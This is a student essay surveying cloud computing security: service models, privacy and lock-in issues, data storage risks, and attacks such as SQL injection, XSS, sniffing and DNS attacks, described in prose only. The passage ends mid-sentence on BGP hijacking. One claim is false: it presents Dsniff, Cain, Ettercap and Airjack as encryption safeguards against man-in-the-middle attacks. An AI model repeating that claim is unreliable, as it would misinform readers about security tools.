Analysis On Security Issues Associated Mitigation Techniques

Print   

02 Nov 2017

Disclaimer:
This essay has been written and submitted by students and is not an example of our work. Please click this link to view samples of our professional work witten by our professional essay writers. Any opinions, findings, conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of EssayCompany.

Cloud computing is a new technology model for enabling convenient, on-demand access to a shared computing resources such as networks, servers, storage, application and services which eliminates the requirements of setting-up of high-cost comuting infrastructure for all IT solutions and services that a industry needs. It gives a flexible and a non-standard architecture yet easily accessible through internet from any computing device. Cloud allows multifold increase of storage capacity and capable of accessing any kind and any source of data from the existing or a new software. It is one of its state of the art architecture that the entire data resides over a set of networked resources. These nwtwork enabled resources enables the data accessing through virtual machines. Hence, the data centres may locate in any part of the world out of reach and control of users. But, one has to understand that various issues need to be understand before getting into a new technology of architectural framework. There needs to be addressed a variety of sensitive security issues along with the privacy in a cloud-based environment. This widespread paper aims in elaborating and analyzing the numerous non-resolved issues which are threatening the overall architecture of cloud computing adoption and diffusion affecting stake holders connected with it.

Keywords

Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), Denial of Service (DoS), Interoperability, Distributed Denial of Service (DDoS), Mobile Cloud Computing (MCC), Optical Character Recognition

1. INTRODUCTION

Internet has been a driving force towards the various

technologies that have been developed since its inception.

Arguably, one of the most discussed among all of them is

Cloud Computing. Over the last few years, cloud computing

paradigm has witnessed an enormous shift towards its

adoption and it has become a trend in the information

technology space as it promises significant cost reductions and

new business potential to its users and providers [1]. The

advantages of using cloud computing include: i) reduced

hardware and maintenance cost, ii) accessibility around the

globe, and iii) flexibility and highly automated processes

wherein the customer need not worry about mundane concerns

like software up-gradation [2, 3].

A plethora of definitions have been given explaining the cloud

computing. Cloud computing is defined as a model for

enabling ubiquitous, convenient, on-demand network access

to a shared pool of configurable computing resources (e.g.

networks, servers, storage devices and services) that can be

rapidly provisioned and released with minimal management

effort or service provider interaction [4]. In such an

environment users need not own the infrastructure for various

computing services. In fact, they can be accessed from any

computer in any part of the world. This integrates features

supporting high scalability and multi-tenancy, offering

enhanced flexibility in comparison to the earlier existing

computing methodologies. It can deploy, allocate or reallocate

resources dynamically with an ability to continuously monitor

their performance [4].

2. CLOUD TAXONOMY,

CHARACTERISTICS AND BENEFITS

Cloud computing can be classified based on the services

offered and deployment models. According to the different

types of services offered, cloud computing can be considered

to consist of three layers. Infrastructure as a Service (IaaS) is

the lowest layer that provides basic infrastructure support

service. Platform as a Service (PaaS) layer is the middle layer,

which offers platform oriented services, besides providing the

environment for hosting user’s applications. Software as a

Service (SaaS) is the topmost layer which features a complete

application offered as service on demand [5, 6].

SaaS ensures that complete applications are hosted on the

internet and users use them. The payment is made on a payper-

use model. It eliminates the need to install and run the

application on the customer’s local computer, thus alleviating

the customer’s burden for software maintenance. In SaaS,

there is the Divided Cloud and Convergence coherence

mechanism whereby every data item has either the "Read

Lock" or "Write Lock" [7]. Two types of servers are used by

SaaS: the Main Consistence Server (MCS) and Domain

Consistence Server (DCS). Cache coherence is achieved by

the cooperation between MCS and DCS [8]. In SaaS, if the

MCS is damaged, or compromised, the control over the cloud

environment is lost. Hence securing the MCS is of great

importance.

In the Platform as a Service approach (PaaS), the offering

also includes a software execution environment. For example,

there could be a PaaS application server that enables the lone

developer to deploy web-based applications without buying

actual servers and setting them up. PaaS model aims to protect

data, which is especially important in case of storage as a

service. In case of congestion, there is the problem of outage

from a cloud environment. Thus the need for security against

outage is important to ensure load balanced service. The data

needs to be encrypted when hosted on a platform for security

reasons. Cloud computing architectures making use of

multiple cryptographic techniques towards providing

cryptographic cloud storage have been proposed in [9].

Infrastructure as a Service (IaaS) refers to the sharing of

hardware resources for executing services, typically using

*Corresponding Author

virtualization technology. Potentially, with IaaS approach,

multiple users use available resources. The resources can

easily be scaled up depending on the demand from user and

they are typically charged on a pay-per-use basis [10]. They

are all virtual machines, which need to be managed. Thus a

governance framework is required to control the creation and

usage of virtual machines. This also helps to avoid

uncontrolled access to user’s sensitive information.

Irrespective of the above mentioned service models, cloud

services can be deployed in four ways depending upon the

customers’ requirements:

· Public Cloud: A cloud infrastructure is provided to

many customers and is managed by a third party

[11]. Multiple enterprises can work on the

infrastructure provided, at the same time. Users can

dynamically provision resources through the internet

from an off-site service provider. Wastage of

resources is checked as the users pay for whatever

they use.

· Private Cloud: Cloud infrastructure, made available

only to a specific customer and managed either by

the organization itself or third party service provider

[11]. This uses the concept of virtualization of

machines, and is a proprietary network.

· Community cloud: Infrastructure shared by several

organizations for a shared cause and may be

managed by them or a third party service provider.

· Hybrid Cloud: A composition of two or more cloud

deployment models, linked in a way that data

transfer takes place between them without affecting

each other.

Moreover, with the technological advancements, we can see

derivative cloud deployment models emerging out of the

various demands and the requirements of users. A virtualprivate

cloud is one such case wherein a public cloud is used

in a private manner, connected to the internal resources of the

customer’s data-centre [12]. With the emergence of high-end

network access technologies like 2G, 3G, Wi-Fi, Wi-Max etc.

and feature phones, a new derivative of cloud computing has

emerged. This is popularly referred to as "Mobile Cloud

Computing (MCC)". It can be defined as a composition of

mobile technology and cloud computing infrastructure where

data and the related processing will happen in the cloud only

with an exception that they can be accessed through a mobile

device and hence termed as mobile cloud computing [13] as

shown in Fig. 1. It is becoming a trend now-a-days and many

organizations are keen to provide accessibility to their

employees to access office network through a mobile device

from anywhere.

Recent technical advancements including the emergence of

HTML5 and various other browser development tools have

only increased the market for mobile cloud-computing. An

increasing trend towards the feature-phone adoption [13] has

also ramped up the MCC market.

Cloud Computing distinguishes itself from other computing

paradigms like grid computing, global computing, and internet

computing in various aspects of on demand service provision,

user centric interfaces, guaranteed QoS (Quality of Service),

and autonomous system [14] etc. A few state of the art

techniques that contribute to cloud computing are:

· Virtualization: It has been the underlying concept

towards such a huge rise of cloud computing in the

modern era. The term refers to providing an

environment that is able to render all the services,

supported by a hardware that can be observed on a

personal computer, to the end users [15]. The three

existing forms of virtualization categorized as:

Server virtualization, Storage virtualization and

Network virtualization, have inexorably led to the

evolution of Cloud computing. For example, a

number of underutilized physical servers may be

consolidated within a smaller number of better

utilized severs [16].

· Web Service and SOA: Web services provided

services over the web using technologies like XML,

Web Services Description Language (WSDL),

Simple Object Access Protocol (SOAP), and

Universal Description, Discovery, and Integration

(UDDI). The service organisation inside a cloud is

managed in the form of Service Oriented

Architecture (SOA) and hence we can define SOA

as something that makes use of multiple services to

perform a specific task [17].

· Application Programming Interface (API): Without

APIs it is hard to imagine the existence of cloud

computing. The whole bunch of cloud services

depend on APIs and allow deployment and

configuration through them. Based on the API

category used viz. control, data and application,

different functions of APIs are invoked and services

are rendered to the users accordingly.

· Web 2.0 /Mash-up: Web 2.0 has been defined as a

technology that enables us to create web pages and

allows the users to interact and collaborate as

creators of user generated content in a virtual

community [18, 19]. It enables the usage of World

Wide Web technology towards a more creative and

a collaborative platform [20]. Mash-up is a web

application that combines data from more than one

source into a single integrated storage tool [21].

These were the few technological advances that led to the

emergence of Cloud Computing and enabled a lot of service

providers to provide the customers a hassle free world of

virtualization fulfilling all their demands. The prominent ones

are: Amazon-EC2 [22, 23] (Elastic Compute Cloud), S3 [22]

(Simple Storage Service), SQS (Simple Queue Service), CF

(Cloud Front), SimpleDB, Google, Microsoft Windows-Azure

[23], ProofPoint, RightScale, Salesforce.com, Workday, Sun

Microsystems etc. and each of them are categorised either as

one of the three main classifications based on the cloud

structure they provide: private, public and hybrid cloud. Each

of the above mentioned cloud structure has its own limitations

and benefits.

The enormous growth in this field has changed the way

computing world is perceived. The IT sector has witnessed the

change in the way situations are handled. However, there are

issues that still persist and have become even more compelling

now. The amount of significant resources available at very

low price is acting as a catalyst for distributed attacks on

confidential information.

With a substantial increase in the number of Cloud Computing

deployments, the issues related to security and privacy have

become more sophisticated and more distributed in the sense

that the user section for such services is growing by leaps and

bounds [24, 25]. With an increase in on-demand application

usage, the possibility of cyber attacks also increases.

Individual users have to frequently provide online information

about their identification, and this could be used by attackers

for identity theft. In order to maintain various security and

privacy issues like: confidentiality, operational integrity,

disaster recovery and identity management, following

schemes should be deployed at least to ensure data security

[26] to some extent:

· An encryption scheme to ensure data security in a

highly interfering environment, maintaining security

standards against popular threats to data storage

security.

· The Service Providers should be given limited

access to the data, just to manage it without being

able to see what exactly the data is.

· Stringent access controls to prevent unauthorized

and illegal access to the servers controlling the

network.

· Data backup and redundant data storage to ensure

seamless data retrieval in case of infrastructure

failure like the recent breakdown issues with the

Amazon cloud.

· Distributed identity management and user security is

to be maintained by using either Lightweight

Directory Access Protocol (LDAP), or published

APIs (Application Programming Interfaces) to

connect into identity systems.

An important aspect of cloud computing is that it does give

rise to a number of security threats from the perspective of

data security for a couple of reasons. Firstly, the traditional

techniques cannot be adopted as these have become quite

obsolete with respect to the ever evolving security threats and

also to avoid data loss in a cloud computing environment. The

second issue is that the data stored in the cloud is accessed a

large number of times and is often subjected to different types

of changes. This may comprise of bank accounts, passwords

and highly confidential files, not to be read by someone else

apart from the owner. Hence, even a small error may result in

loss of data security.

This paper is aimed at developing an understanding of the

manifold security threats that hamper the security and privacy

of a user. Characteristics of a secure cloud infrastructure

(public or private) will be discussed as also its challenges and

the ways to solve them.

3. OBSTACLES AND OPPORTUNITIES

FOR CLOUD COMPUTING

In spite of being a buzzword, there are certain aspects

associated with Cloud Computing as a result of which many

organizations are still not confident about moving into the

cloud. Certain loopholes in its architecture have made cloud

computing vulnerable to various security and privacy threats

[27]. A few issues limiting the boundaries of this

transformational concept are:

Fig 1: A Mobile Cloud Computing Scenario

3.1 Privacy and Security

The fundamental factor defining the success of any new

computing technology is the level of security it provides [28,

29, 30]. Whether the data residing in the cloud is secure to a

level so as to avoid any sort of security breach or is it more

secure to store the data away from cloud in our own personal

computers or hard drives? At-least we can access our hard

drives and systems whenever we wish to, but cloud servers

could potentially reside anywhere in the world and any sort of

internet breakdown can deny us access to the data stored in the

cloud. The cloud service providers insist that their servers and

the data stored in them is sufficiently protected from any sort

of invasion and theft. Such companies argue that the data on

their servers is inherently more secure than data residing on a

myriad of personal computers and laptops. However, it is also

a part of cloud architecture, that the client data will be

distributed over these individual computers regardless of

where the base repository of data is ultimately located. There

have been instances when their security has been invaded and

the whole system has been down for hours. At-least half a

dozen of security breaches occurred last year bringing out the

fundamental limitations of the security model of major Cloud

Service Providers (CSP). With respect to cloud computing

environment, privacy is defined as "the ability of an entity to

control what information it reveals about itself to the

cloud/cloud SP, and the ability to control who can access that

information". R. Gellman discusses the standards for

collection, maintenance and disclosure of personality

identifiable information in [24]. Information requiring privacy

and the various privacy challenges need the specific steps to

be taken in order to ensure privacy in the cloud as discussed in

[31 , 32].

In case of a public-cloud computing scenario, we have

multiple security issues that need to be addressed in

comparison to a private cloud computing scenario. A public

cloud acts as a host of a number of virtual machines, virtual

machine monitors, and supporting middleware [33] etc. The

security of the cloud depends on the behaviour of these

objects as well as on the interactions between them. Moreover,

in a public cloud enabling a shared multi-tenant environment,

as the number of users increase, security risks get more

intensified and diverse. It is necessary to identify the attack

surfaces which are prone to security attacks and mechanisms

ensuring successful client-side and server-side protection [34].

Because of the multifarious security issues in a public cloud,

adopting a private cloud solution is more secure with an

option to move to a public cloud in future, if needed [35].

Emergence of cloud computing owes significantly to mashup.

A mashup is an application that combines data, or

functionality from multiple web sources and creates new

services using these. As these involve usage of multiple subapplications

or elements towards a specific application, the

security challenges are diverse and intense. Based on this idea,

various security architectures such as: a secure component

model addressing the problem of securing mash-up

applications and an entropy based security framework for

cloud oriented service mash-ups have been proposed in [36,

66]. Also, privacy needs to be maintained as there are high

chances of an eavesdropper to be able to sneak in.

3.2 Performance Unpredictability, Latency

and Reliability

It has been observed that virtual machines can share CPUs and

main memory in a much better way in comparison to the

network and disk I/O. Different EC2 instances vary more in

their I/O performance than main memory performance [37].

One of the ways to improve I/O performance is to improve

architecture and operating systems to efficiently virtualize

interrupts and I/O channels. Another possibility is to make use

of flash memory which is a type of semiconductor memory

that preserves information even when powered off and since it

has no moving parts, it is much faster to access and uses

comparatively less energy. Flash memory can sustain many

more I/O operations than disks, so multiple virtual machines

with large number of I/O operations would coexist better on

the same physical computer [37].

Latency [38, 39] has always been an issue in cloud computing

with data expected to flow around different clouds. The other

factors that add to the latency are: encryption and decryption

of the data when it moves around unreliable and public

networks, congestion, packet loss and windowing. Congestion

adds to the latency when the traffic flow through the network

is high and there are many requests (could be of same priority)

that need to be executed at the same time. Windowing is

another message passing technique whereby the receiver has

to send a message to the sender that it has received the earlier

sent packet and hence this additional traffic adds to the

network latency. Moreover, the performance of the system is

also a factor that should be taken into account. Sometimes the

cloud service providers run short of capacity either by

allowing access to too many virtual machines or reaching

upper throughput thresholds on their Internet links because of

high demand arising from the customer community. This

affects the system performance and adds to the latency of the

system.

3.3 Portability and Interoperability

Organizations may need to change the cloud providers and

there have been cases when companies are unable to move

their data and applications to another cloud platform that they

would prefer over the existing one. Such a scenario is termed

as Lock-in and it refers to the challenges faced by a cloud

customer trying to migrate from one cloud provider to

another. More often, it has been seen that changing a cloud

provider involves multiple risks and may lead to system

breakdown if not executed properly. Nature of Lock-in and

associated issues are very much dependent on the cloud type

being used [40]. In case of a SaaS offering, an application is

used by the customer provided by the cloud provider. While

migrating between the cloud providers, there may be instances

when the data to be moved does not really fit the data format

as required in the new application. This will require extra

effort to be put in to make sure that the data is arranged in a

format that matches the new application ensuring no data loss

in the process. Additional steps such as: performing regular

data extraction and back-up to a format that is usable even

without the SaaS application, understanding how the

application has been developed and monitored, and the major

interfaces and their integration between the platforms need to

be taken care of.

PaaS lock-in can be observed in cases where the language

used to develop an application on a platform is not supported

on the platform to be migrated to. It is more visible at API

level as different providers offer different APIs. PaaS lock-in

can be avoided if the following points are considered and

addressed:

· Cloud offering with an open architecture and

standard syntax should be supported.

· Understand the application components and

modules specific to the PaaS provider and how the

basic services like monitoring, logging etc. are

performed.

· Understand the control functions specific to the

cloud provider and their counterparts on an Open

platform.

IaaS lock-in depends on the infrastructure services being used.

The most obvious form of IaaS lock-in can be observed in the

form of data lock-in. With more and more data pushed to the

cloud, data lock-in increases unless the cloud provider ensures

data portability. Understanding how the virtual machine

images are maintained and eliminating any provider specific

dependency for a virtual machine environment will serve at

the time of transition from one IaaS platform to other.

Identifying the hardware dependencies will minimize the

issues at the time of migration. In order to avoid this lock-ins,

the customer should be clear of the choices available in the

market and the extent to which they match up to its business,

operational and technical requirements.

Also, some companies use different cloud platforms for

different applications based on their requirements and the

services provided by the cloud service providers (CSPs). In

some cases, different cloud platforms are used for a particular

application or different cloud platforms have to interact with

each other for completing a particular task. The internal

infrastructure of the organization is needed to maintain a

balance to handle the interoperability between different cloud

platforms [41]. The risk of outsourced services going out of

control is high in a hybrid, public and private cloud

environment. All data has to be encrypted for proper security,

and key management becomes a difficult task in such

situations [42]. The users have actually no idea of where their

information is stored [43]. Normally, a user’s data is stored in

a shared environment, along-with other user’s data. The issue

of inter-security handling becomes important in such cases. A

cloud security management model is discussed in [42] to serve

as a standard for designing cloud security management tools.

The model uses four interoperating layers for managing the

cloud security.

Thus we see that although the buzz of cloud computing

prevails everywhere because of the multi-fold features and

facilities provided by it, there are still issues that need to be

solved in order to reach the landmarks set by it.

3.4 Data Breach through Fibre Optic

Networks

It has been noticed that the security risks for the data in transit

has increased over the last few years. Data transitioning is

quite normal now-a-days and it may include multiple datacentres

and other cloud deployment models such as public or

private cloud. Security of the data leaving a data-centre to

another data-centre is a major concern as it has been breached

quite a number of times in the recent times.

This data transfer is done over a network of fibre-optic cables

which were considered to be a safe mode of data-transfer,

until recently an illegal fibre eavesdropping device in Telco

Verizon’s optical network placed at a mutual fund company

was discovered by US Security forces [44]. There are devices

that can tap the data flow without even disturbing it and

accessing fibre, through which data is being transferred. They

are generally laid underground and hence it is difficult to

access these fibre-optic cables. And hence it becomes quite

important to ensure data security over the transitioning

networks.

3.5 Data Storage over IP Networks

Online data storage is becoming quite popular now-a-days and

it has been observed that majority of enterprise storage will be

networked in the coming years, as it allows enterprises to

maintain huge chunks of data without setting up the required

architecture. Although there are many advantages of having

online data storage, there are security threats that could cause

data leakage or data unavailability at crucial hour. Such issues

are observed more frequently in the case of dynamic data that

keeps flowing within the cloud in comparison to static data.

Depending upon the various levels of operations and storage

provided, these networked devices are categorized into SAN

(Storage area network) and NAS (network-attached storage)

and since these storage networks reside on various servers,

there are multiple threats associated with them. Various threat

zones that may affect and cause the vulnerability of a storage

network have been discussed in [45].

Besides these, from a Mobile Cloud Computing (MCC)

perspective, unlike cloud computing there are several

additional challenges that need to be addressed to enable MCC

reach its maximum potential:

· Network accessibility: Internet has been the major

factor towards the cloud computing evolution and

without having the network (Internet) access it will

not be possible to access the mobile cloud limiting

the available applications that can be used.

· Data Latency: Data transfer in a wireless network is

not as continuous and consistent as it is in case of a

dedicated wired LAN. And this inconsistency is

largely responsible for longer time intervals for data

transfer at times. Also, the distance from the source

adds up to the longer time intervals observed in case

of data transfer and other network related activities

because of an increase in the number of intermediate

network components.

· Dynamic Network monitoring and Scalability:

Applications running on mobiles in a mobile cloud

computing platform should be intelligent enough to

adapt to the varying network capacities and also

these should be accessible through different

platforms without suffering any data loss.

Sometimes, a user while working on a smart phone

may need to move on to a feature phone and when

he accesses the application through a smart phone;

he should not encounter any data loss.

· Confidentiality of mobile cloud-based data sharing:

The confidential data on mobile phones using cloudbased

mobile device support might become public

due to a hacked cloud. The root-level access to

cloud services and information can be easily

accessed from a stolen mobile device. If the stolen

device belongs to a system administrator, they may

even provide direct and automated access to highly

confidential information.

· Better access control and identity management:

Cloud computing involves virtualization, and hence

the need for user authentication and control across

the clouds is high. The existing solutions are not

able to handle the case of multiple clouds. Since

data belonging to multiple users may be stored in a

single hypervisor, specific segmentation measures

are needed to overcome the potential weakness and

flaws in hypervisor platform.

Security challenges in a mobile cloud computing environment

are slightly different as compared to the above mentioned

network related challenges. With applications lying in a cloud,

it is possible for the hackers to corrupt an application and gain

access to a mobile device while accessing that application. In

order to avoid these, strong virus-scanning and malware

protection software need to be installed to avoid any type of

virus/malware check into the mobile system. Besides, by

embedding device identity protection, like allowing access to

the authorized user based on some form of identity check

feature, unauthorized accesses can be blocked.

Two types of services, have been defined in [46], namely (i)

critical security service, and (ii) normal security service. The

resource in a cloud has to be properly partitioned according to

different user’s requests. The maximal system rewards and

system service overheads are considered for the security

service. Hence, we see that although mobile cloud computing

is still in its nascent state, there are various security issues,

that plague cloud computing and its derivatives.

4. DATA STORAGE AND SECURITY IN

THE CLOUD

Many cloud service providers provide storage as a form of

service. They take the data from the users and store them on

large data centres, hence providing users a means of storage.

In spite of claims by the cloud service providers about the

safety of the data stored in the cloud there have been cases

when the data stored in these clouds have been modified or

lost due to some security breach or some human error. Attack

vectors in a cloud storage platform have been discussed and

how the same platform is exploited to hide files with

unlimited storage in [47]. In [47], authors have studied the

storage mechanism of Dropbox (a file storage solution in the

cloud) and carried three types of attack viz. Hash Value

manipulation attack, stolen host id attack and direct download

attack. Once the host id is known, the attacker can upload and

link arbitrary files to the victim’s Dropbox account.

Various cloud service providers adopt different technologies

to safeguard the data stored in their cloud. But the question is:

Is the data stored in these clouds really secure? The virtualized

nature of cloud storage makes the traditional mechanisms

unsuitable for handling the security issues [23]. These service

providers use different encryption techniques such as: public

key encryption and private key encryption to secure the data

stored in the cloud. A similar technique providing data storage

security, utilizing the homomorphic token with distributed

verification of erasure-coded data has been discussed in [48].

Trust based methods are useful in establishing relationships in

a distributed environment. A domain based trust-model has

been proposed in [49] to handle security and interoperability

in cross clouds. Every domain has a special agent for trust

management. It proposes different trust mechanisms for users

and service providers.

The following aspects of data security should be taken care

while moving into a cloud:

1. Data-in-transit

2. Data-at-rest

3. Data Lineage

4. Data Remanence

5. Data Provenance

In case of data-in-transit, the biggest risk is associated with the

encryption technology that is being used, whether it is up-todate

with the present day security threats and makes use of a

protocol that provides confidentiality as well as integrity to the

data-in-transit. Simply going for an encryption technology

does not serve the purpose. In addition to using an encryption

– decryption algorithm for secure data transfer, data can be

broken into packets and then transferred through disjoint paths

to the receiver. It reduces the chances of all the packets being

captured by an adversary. And the data cannot be known until

all the packets are coupled together in a particular manner. A

similar approach has been discussed in [50, 51].

Managing data at rest in an IaaS scenario is more feasible in

comparison to managing the same over a SaaS and PaaS

platform because of restricted rights over the data. In a SaaS

and PaaS platform, data is generally commingled with other

users’ data. There have been cases wherein even after

implementing data tagging to prevent unauthorized access, it

was possible to access data through exploitation of application

vulnerability [25]. The main issue with data-at-rest in the

cloud is loss of control, even a non-authorized user/party may

have access to the data (it is not supposed to access) in a

shared environment. However, now-a-days, storage devices

with in-built encryption techniques are available which are

resilient to unauthorized access to certain extent. Even in such

a case, nothing can be done in case the encryption and

decryption keys are accessible to the malicious user. A

lockbox approach wherein the actual keys are stored in a

lockbox and there is a separate key to access that lockbox is

useful in the above mentioned case. In such a scenario, a user

will be provided a key based on identity management

technique corresponding to the COI (community of interest)

he belongs to, to access the lockbox. Whenever the user wants

to access the data, he needs to acquire the COI key to the

lockbox and then the user gets appropriate access to the

relevant data [9]. Homomorphic encryption techniques, which

are capable of processing the encrypted data and then bringing

back the data into its original form, are also providing better

means to secure the data-at-rest. A simple technique for

securing data at rest in a cloud computing environment has

been mentioned in [52]. This technique makes use of public

encryption technique.

Tracing the data path is known as data lineage and it is

important for auditing purpose in the cloud. Providing data

lineage is a challenging task in a cloud computing

environment and more so in a public cloud. Since the data

flow is no longer linear in a virtualized environment within

the cloud, it complicates the process of mapping the data flow

to ensure integrity of the data. Proving data provenance is yet

another challenging task in a cloud computing environment.

Data provenance refers to maintaining the integrity of the

data, ensuring that it is computationally correct. Taxonomy of

provenance techniques and various data provenance

techniques have been discussed in [53].

Another major issue that is mostly neglected is of Data-

Remanence. It refers to the data left out in case of data transfer

or data removal. It causes minimal security threats in private

cloud computing offerings, however severe security issues

may emerge out in case of public cloud offerings as a result of

data-remanence [54, 56].

Various cases of cloud security breach came into light in

recent past. Cloud based email marketing services company,

Epsilon, suffered a data breach, due to which a large section of

its customers including JP Morgan Chase, Citibank, Barclays

Bank, hotel chains such as Marriott and Hilton, and big

retailers such as Best Buy and Walgreens were affected

heavily and huge chunk of customer data was exposed to the

hackers which includes customer email ids and bank account

details [55].

A similar incident happened with Amazon causing the

disruption of its EC2 services. Popular sites like: Quora, Four-

Square and Reditt were the main sufferers [57]. The above

mentioned events depict the vulnerability of the cloud

services.

Another important aspect is that the known and popular

domains have been used to launch malicious software or hack

into companies’ secure database. A similar issue happened

with Amazon’s S3 platform and the hackers were able to

launch corrupted codes using a trusted domain [58]. Hence the

question that arises now is who to be provided the "trusted"

tag. It established that Amazon was prone to side-channel

attacks, and a malicious virtual machine, occupying the same

server as the target, could easily gain access to the confidential

data [59]. The question is: should any such security policy be

in place for these trusted users as well?

An incident related to the data loss occurred, sometime back,

with the online storage service provider "Media max" (also

known as "The Linkup") when due to system administration

error; active customer data was deleted, leading to huge data

loss [60]. SLA (Service Level Agreement) with the Cloud

Service providers should contain all the points that may cause

data loss either due to some human or system generated error.

Hence, it must be ensured that redundant copies of the user

data should be stored in order to handle any sort of adverse

situation leading to data loss.

Virtualization in general increases the security of a cloud

environment. With virtualization, a single machine can be

divided into many virtual machines, thus providing better data

isolation and safety against denial of service attacks [68]. The

VMs (Virtual Machine) provide a security test-bed for

execution of untested code from un-trusted users. A

hierarchical reputation system has been proposed in the paper

[61] for managing trust in a cloud environment.

5. THREATS TO SECURITY IN CLOUD

COMPUTING

The chief concern in cloud environments is to provide security

around multi-tenancy and isolation, giving customers more

comfort besides "trust us" idea of clouds [62]. There has been

survey works reported, which classify security threats in cloud

based on the nature of the service delivery models of a cloud

computing system [63]. However, security requires a holistic

approach. Service delivery model is one of many aspects that

need to be considered for a comprehensive survey on cloud

security. Security at different levels such as Network level,

Host level and Application level is necessary to keep the cloud

up and running continuously and the same has been discussed

in [64] for Amazon EC2 cloud. In accordance with these

different levels, various types of security breaches may occur

which have been classified in this section.

5.1 Basic Security

Web 2.0, a key technology towards enabling the use of

Software as a Service (SaaS) relieves the users from tasks like

maintenance and installation of software. It has been used

widely all around. As the user community using Web 2.0 is

increasing by leaps and bounds, the security has become more

important than ever for such environment [65, 67].

SQL injection attacks, are the one in which a malicious code is

inserted into a standard SQL code. Thus the attackers gain

unauthorized access to a database and are able to access

sensitive information [68]. Sometimes the hacker’s input data

is misunderstood by the web-site as the user data and allows it

to be accessed by the SQL server and this lets the attacker to

have know-how of the functioning of the website and make

changes into that. Various techniques like: avoiding the usage

of dynamically generated SQL in the code, using filtering

techniques to sanitize the user input etc. are used to check the

SQL injection attacks. A proxy based architecture towards

preventing SQL Injection attacks which dynamically detects

and extracts users’ inputs for suspected SQL control

sequences has been proposed in [69].

Cross Site Scripting (XSS) attacks, which inject malicious

scripts into Web contents have become quite popular since the

inception of Web 2.0. There are two methods for injecting the

malicious code into the web-page displayed to the user: Stored

XSS and Reflected XSS. In a Stored XSS, the malicious code

is permanently stored into a resource managed by the web

application and the actual attack is carried out when the victim

requests a dynamic page that is constructed from the contents

of this resource [70]. However, in case of a Reflected XSS,

the attack script is not permanently stored; in fact it is

immediately reflected back to the user [70].

Based on the type of services provided, a website can be

classified as static or dynamic. Static websites do not suffer

from the security threats which the dynamic websites do

because of their dynamism in providing multi-fold services to

the users. As a result, these dynamic websites get victimized

by XSS attacks. It has been observed quite often that amidst

working on the internet or surfing, some web-pages or popups

open up with the request of being clicked away to view

the content contained in them. More often either unknowingly

(about the possible hazards) or out of curiosity users click on

these hazardous links and thus the intruding third party gets

control over the user’s private information or hack their

accounts after having known the information available to

them. Various techniques like: Active Content Filtering,

Content Based Data Leakage Prevention Technology, Web

Application Vulnerability Detection Technology has already

been proposed to prevent XSS attacks [71]. These

technologies adopt various methodologies to detect security

flaws and fix them. A blueprint based approach that

minimizes the dependency on web browsers towards

identifying untrusted content over the network has been

proposed in [72].

Another class of attacks, quite popular to SaaS, are termed as

Man in the Middle attacks (MITM). In such an attack, an

entity tries to intrude in an ongoing conversation between a

sender and a client to inject false information and to have

knowledge of the important data transferred between them.

Various tools implementing strong encryption technologies

like: Dsniff, Cain, Ettercap, Wsniff, Airjack etc. have been

developed in order to provide safeguard against them. A

detailed study towards preventing man in the middle attacks

has been presented in [73].

A few of the important points like: evaluating software as a

service security, separate endpoint and server security

processes, evaluating virtualization at the end-point have been

mentioned by Eric Ogren, in an article at Security.com to

tackle traditional security flaws [74].

Hence, security at different levels is necessary in order to

ensure proper implementation of cloud computing

environment such as: server access security, internet access

security, database access security, data privacy security and

program access security. In addition, we need to ensure data

security at network layer, and data security at physical and

application layer to maintain a secure cloud.

5.2 Network Level Security

Networks are classified into different types like: shared and

non-shared, public or private, small area or large area

networks and each of them have a number of security threats

to deal with. While considering the network level security, it

is important to distinguish between public and private clouds.

There is less vulnerability in a private cloud in comparison to

public cloud. Almost all the organizations have got a private

network in place and hence the network topology for a private

cloud gets defined. And in most of the cases, the security

practices implemented (in the organization’s private network)

apply to the private cloud too. However, in case of a public

cloud implementation, network topology might need to be

changed in order to implement the security features and the

following points need to be addressed as part of public cloud

implementation:

· Confidentiality and Integrity of the data-in-transit

needs to be ensured while adopting a public cloud

architecture.

· Ensuring proper access controls within the cloud.

o Migrating to a cloud exposes the resources

to Internet and the data which has been

hosted over a private network till now,

becomes accessible over the internet. This

also increases the chances of data leakage

or a security breach which should be taken

care of.

o It may happen that the security policies

implemented inside the cloud are not up to

date and as a result other parties within the

cloud are able to access data belonging to

some other customer.

· The trusted encryption schemes and tokenization

models need to be changed to enhance the security

in a public cloud.

We can now see the reasons because of which organizations

are not moving their sensitive data to public clouds and

instead relying on private cloud. In addition to the concerns

mentioned above, issues associated with network level

security comprise of: DNS attacks, Sniffer attacks, issue of

reused IP address, Denial of Service (DoS) and Distributed

Denial of Service attacks (DDoS) etc. [75].

5.2.1 DNS Attacks

Domain Name Server (DNS) performs the translation of a

domain name to an IP address since the domain names are

much easier to remember. Hence, the DNS servers are needed.

But there are cases when having called the server by name, the

user has been routed to some other malicious cloud instead of

the one he asked for and hence using IP address is not always

feasible. Although using DNS security measures like: Domain

Name System Security Extensions (DNSSEC) reduces the

effects of DNS threats but still there are cases when these

security measures prove to be inadequate when the path

between a sender and a receiver gets rerouted through some

malicious connection. It may happen that even after all the

DNS security measures are taken, the route selected between

the sender and receiver cause security problems [76].

5.2.2 Sniffer Attacks

These types of attacks are launched by applications which can

capture packets flowing in a network and if the data that is

being transferred through these packets is not encrypted, it can

be read. There are chances that vital information flowing

across the network can be traced or captured. A sniffer

program, through the NIC (Network Interface Card) ensures

that the data/traffic linked to other systems on the network

also gets recorded. It can be achieved by placing the NIC in

promiscuous mode and in promiscuous mode it can track all

data, flowing on the same network. A malicious sniffing

detection platform based on ARP (address resolution protocol)

and RTT (round trip time) can be used to detect a sniffing

system running on a network [77].

5.2.3 Issue of Reused IP Addresses

Each node of a network is provided an IP address and the

number of IP addresses that can be assigned is limited. A large

number of cases related to re-used IP-address issue have been

observed lately. When a particular user moves out of a

network, then the IP-address associated with him (earlier) is

assigned to a new user. This sometimes risks the security of

the new user as there is a certain time lag between the change

of an IP address in DNS and the clearing of that address in

DNS caches [25]. And hence, we can say that sometimes

though the old IP address is being assigned to a new user still

the chances of accessing the data by some other user is not

negligible as the address still exists in the DNS cache and the

data belonging to a particular user may become accessible to

some other user violating the privacy of the earlier user.

5.2.4 BGP Prefix Hijacking

Prefix hijacking is a type of network attack in which a wrong

announcement related to the IP addresses associated with an

Autonomous system (AS) is made. Hence, malicious parties

get access to the untraceable IP addresses. On the internet, IP

space is associated in blocks and remains under the control of

ASs. An autonomous system can broadcast information of an

IP contained in its regime to all its neighbours.

These ASs communicate using the Border Gateway Protocol

(BGP) model. Sometimes, due to some error, a faulty AS may

